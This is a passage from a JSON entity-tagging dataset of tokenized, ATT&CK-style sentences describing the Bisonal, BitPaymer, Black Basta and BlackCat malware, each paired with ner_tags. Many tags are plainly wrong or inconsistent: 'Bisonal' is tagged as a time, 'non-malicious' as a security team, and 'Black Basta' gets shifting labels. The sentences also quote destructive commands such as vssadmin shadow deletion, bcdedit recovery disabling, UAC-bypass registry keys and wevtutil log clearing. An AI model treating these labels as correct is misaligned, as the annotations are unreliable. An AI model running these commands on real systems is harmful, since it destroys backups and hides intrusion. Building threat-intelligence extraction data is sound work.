"Bisonal's", - "DLL", - "file", - "and", - "non-malicious", - "decoy", - "file", - "are", - "encrypted", - "with", - "RC4", - "and", - "some", - "function", - "name", - "strings", - "are", - "obfuscated." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "added", - "the", - "exfiltrated", - "data", - "to", - "the", - "URL", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "will", - "delete", - "its", - "dropper", - "and", - "VBS", - "scripts", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "can", - "retrieve", - "a", - "file", - "listing", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "the", - "capability", - "to", - "download", - "files", - "to", - "execute", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "relied", - "on", - "users", - "to", - "execute", - "malicious", - "file", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "dropped", - "a", - "decoy", - "payload", - "with", - "a", - ".jpg", - "extension", - "that", - "contained", - "a", - "malicious", - "Visual", - "Basic", - "script." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "renamed", - "malicious", - "code", - "to", - "`msacm32.dll`", - "to", - "hide", - "within", - "a", - "legitimate", - "library;", - "earlier", - "versions", - "were", - "disguised", - "as", - "`winhelp`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "deleted", - "Registry", - "keys", - "to", - "clean", - "up", - "its", - "prior", - "activity." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "the", - "Windows", - "API", - "to", - "communicate", - "with", - "the", - "Service", - "Control", - "Manager", - "to", - "execute", - "a", - "thread." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "raw", - "sockets", - "for", - "network", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "can", - "obtain", - "a", - "list", - "of", - "running", - "processes", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "supported", - "use", - "of", - "a", - "proxy", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "the", - "RegQueryValueExA", - "function", - "to", - "retrieve", - "proxy", - "information", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "added", - "itself", - "to", - "the", - "Registry", - "key", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "as", - "part", - "of", - "the", - "Registry", - "Run", - "key", - "it", - "adds:", - "<code>HKEY_CURRENT_USER", - "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\”vert”", - "=", - "“rundll32.exe", - "c:\\windows\\temp\\pvcu.dll", - ",", - "Qszdez”</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "the", - "MPRESS", - "packer", - "and", - "similar", - "tools", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "been", - "delivered", - "as", - "malicious", - "email", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "encoded", - "binary", - "data", - "with", - "Base64", - "and", - "ASCII." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "variants", - "reported", - "on", - "in", - "2014", - "and", - "2015", - "used", - "a", - "simple", - "XOR", - "cipher", - "for", - "C2.", - "Some", - "Bisonal", - "samples", - "encrypt", - "C2", - "communications", - "with", - "RC4." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "commands", - "and", - "API", - "calls", - "to", - "gather", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "can", - "execute", - "<code>ipconfig</code>", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "can", - "check", - "the", - "system", - "time", - "set", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "checked", - "if", - "the", - "malware", - "is", - "running", - "in", - "a", - "virtual", - "environment", - "with", - "the", - "anti-debug", - "function", - "GetTickCount()", - "to", - "compare", - "the", - "timing." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "can", - "check", - "to", - "determine", - "if", - "the", - "compromised", - "system", - "is", - "running", - "on", - "VMware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal's", - "dropper", - "creates", - "VBS", - "scripts", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "launched", - "cmd.exe", - "and", - "used", - "the", - "ShellExecuteW()", - "API", - "function", - "to", - "execute", - "commands", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Bisonal", - "has", - "been", - "modified", - "to", - "be", - "used", - "as", - "a", - "Windows", - "service." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Features" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "suppress", - "UAC", - "prompts", - "by", - "setting", - "the", - "<code>HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command</code>", - "registry", - "key", - "on", - "Windows", - "10", - "or", - "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", - "on", - "Windows", - "7", - "and", - "launching", - "the", - "<code>eventvwr.msc</code>", - "process,", - "which", - "launches", - "BitPaymer", - "with", - "elevated", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "import", - "a", - "hard-coded", - "RSA", - "1024-bit", - "public", - "key,", - "generate", - "a", - "128-bit", - "RC4", - "key", - "for", - "each", - "file,", - "and", - "encrypt", - "the", - "file", - "in", - "place,", - "appending", - "<code>.locked</code>", - "to", - "the", - "filename." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "has", - "used", - "RC4-encrypted", - "strings", - "and", - "string", - "hashes", - "to", - "avoid", - "identifiable", - "strings", - "within", - "the", - "binary." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "compares", - "file", - "names", - "and", - "paths", - "to", - "a", - "list", - "of", - "excluded", - "names", - "and", - "directory", - "names", - "during", - "encryption." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "attempts", - "to", - "remove", - "the", - "backup", - "shadow", - "files", - "from", - "the", - "host", - "using", - "<code>vssadmin.exe", - "Delete", - "Shadows", - "/All", - "/Quiet</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "enumerate", - "the", - "sessions", - "for", - "each", - "user", - "logged", - "onto", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "set", - "values", - "in", - "the", - "Registry", - "to", - "help", - "in", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "has", - "copied", - "itself", - "to", - "the", - "<code>:bin</code>", - "alternate", - "data", - "stream", - "of", - "a", - "newly", - "created", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "has", - "used", - "dynamic", - "API", - "resolution", - "to", - "avoid", - "identifiable", - "strings", - "within", - "the", - "binary,", - "including", - "<code>RegEnumKeyW</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "search", - "for", - "network", - "shares", - "on", - "the", - "domain", - "or", - "workgroup", - "using", - "<code>net", - "view", - "<host></code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "use", - "the", - "RegEnumKeyW", - "to", - "iterate", - "through", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "has", - "set", - "the", - "run", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "use", - "<code>net", - "view</code>", - "to", - "discover", - "remote", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "enumerate", - "existing", - "Windows", - "services", - "on", - "the", - "host", - "that", - "are", - "configured", - "to", - "run", - "as", - "LocalSystem." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "modify", - "the", - "timestamp", - "of", - "an", - "executable", - "so", - "that", - "it", - "can", - "be", - "identified", - "and", - "restored", - "by", - "the", - "decryption", - "tool." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "use", - "the", - "tokens", - "of", - "users", - "to", - "create", - "processes", - "on", - "infected", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "can", - "use", - "<code>icacls", - "/reset</code>", - "and", - "<code>takeown", - "/F</code>", - "to", - "reset", - "a", - "targeted", - "executable's", - "permissions", - "and", - "then", - "take", - "ownership." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BitPaymer", - "has", - "attempted", - "to", - "install", - "itself", - "as", - "a", - "service", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "had", - "added", - "data", - "prior", - "to", - "the", - "Portable", - "Executable", - "(PE)", - "header", - "to", - "prevent", - "automatic", - "scanners", - "from", - "identifying", - "the", - "payload." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Black", - "Basta", - "dropper", - "has", - "been", - "digitally", - "signed", - "with", - "a", - "certificate", - "issued", - "by", - "Akeo", - "Consulting", - "for", - "legitimate", - "executables", - "used", - "for", - "creating", - "bootable", - "USB", - "drives." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "encrypt", - "files", - "with", - "the", - "ChaCha20", - "cypher", - "and", - "using", - "a", - "multithreaded", - "process", - "to", - "increase", - "speed." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Black", - "Basta", - "dropper", - "can", - "check", - "system", - "flags,", - "CPU", - "registers,", - "CPU", - "instructions,", - "process", - "timing,", - "system", - "libraries,", - "and", - "APIs", - "to", - "determine", - "if", - "a", - "debugger", - "is", - "present." - ], - "ner_tags": [ - "O", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "enumerate", - "specific", - "files", - "for", - "encryption." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "delete", - "shadow", - "copies", - "using", - "vssadmin.exe." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "set", - "the", - "desktop", - "wallpaper", - "on", - "victims'", - "machines", - "to", - "display", - "a", - "ransom", - "note." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Black", - "Basta", - "binary", - "can", - "use", - "`chmod`", - "to", - "gain", - "full", - "permissions", - "to", - "targeted", - "files." - ], - "ner_tags": [ - "O", - "I-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "been", - "downloaded", - "and", - "executed", - "from", - "malicious", - "Excel", - "files." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "established", - "persistence", - "by", - "creating", - "a", - "new", - "service", - "named", - "`FAX`", - "after", - "deleting", - "the", - "legitimate", - "service", - "by", - "the", - "same", - "name." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Black", - "Basta", - "dropper", - "has", - "mimicked", - "an", - "application", - "for", - "creating", - "USB", - "bootable", - "drivers." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "modify", - "the", - "Registry", - "to", - "enable", - "itself", - "to", - "run", - "in", - "safe", - "mode", - "and", - "to", - "modify", - "the", - "icons", - "and", - "file", - "extensions", - "for", - "encrypted", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "the", - "ability", - "to", - "use", - "native", - "APIs", - "for", - "numerous", - "functions", - "including", - "discovery", - "and", - "defense", - "evasion." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "used", - "PowerShell", - "scripts", - "for", - "discovery", - "and", - "to", - "execute", - "files", - "over", - "the", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "use", - "LDAP", - "queries", - "to", - "connect", - "to", - "AD", - "and", - "iterate", - "over", - "connected", - "workstations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "reboot", - "victim", - "machines", - "in", - "safe", - "mode", - "with", - "networking", - "via", - "`bcdedit", - "/set", - "safeboot", - "network`." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "check", - "system", - "flags", - "and", - "libraries,", - "process", - "timing,", - "and", - "API's", - "to", - "detect", - "code", - "emulation", - "or", - "sandboxing." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "enumerate", - "volumes", - "and", - "collect", - "system", - "boot", - "configuration", - "and", - "CPU", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "check", - "whether", - "the", - "service", - "name", - "FAX", - "is", - "present." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "make", - "a", - "random", - "number", - "of", - "calls", - "to", - "the", - "`kernel32.beep`", - "function", - "to", - "hinder", - "log", - "analysis." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "use", - "`cmd.exe`", - "to", - "enable", - "shadow", - "copy", - "deletion." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "has", - "used", - "WMI", - "to", - "execute", - "files", - "over", - "the", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Black", - "Basta", - "can", - "create", - "a", - "new", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "modify", - "access", - "tokens." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "bypass", - "UAC", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "clear", - "Windows", - "event", - "logs", - "using", - "`wevtutil.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "to", - "encrypt", - "Windows", - "devices,", - "Linux", - "devices,", - "and", - "VMWare", - "instances." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Tool", - "B-Features", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "to", - "wipe", - "VM", - "snapshots", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "utilize", - "`net", - "use`", - "commands", - "to", - "identify", - "domain", - "users." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "determine", - "if", - "a", - "user", - "on", - "a", - "compromised", - "host", - "has", - "domain", - "admin", - "privileges." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "enumerate", - "files", - "for", - "encryption." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "delete", - "shadow", - "copies", - "using", - "`vssadmin.exe", - "delete", - "shadows", - "/all", - "/quiet`", - "and", - "`wmic.exe", - "Shadowcopy", - "Delete`;", - "it", - "can", - "also", - "modify", - "the", - "boot", - "loader", - "using", - "`bcdedit", - "/set", - "{default}", - "recoveryenabled", - "No`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "change", - "the", - "desktop", - "wallpaper", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "replicate", - "itself", - "across", - "connected", - "servers", - "via", - "`psexec`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "to", - "add", - "the", - "following", - "registry", - "key", - "on", - "compromised", - "networks", - "to", - "maintain", - "persistence:", - "`HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services", - "\\LanmanServer\\Paramenters`" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "to", - "discover", - "network", - "shares", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "broadcasts", - "NetBIOS", - "Name", - "Service", - "(NBNC)", - "messages", - "to", - "search", - "for", - "servers", - "connected", - "to", - "compromised", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "has", - "the", - "ability", - "to", - "stop", - "VM", - "services", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "obtain", - "the", - "computer", - "name", - "and", - "UUID,", - "and", - "enumerate", - "local", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "utilize", - "`net", - "use`", - "commands", - "to", - "discover", - "the", - "user", - "name", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "BlackCat", - "can", - "execute", - "commands", - "on", - "a", - "compromised", - 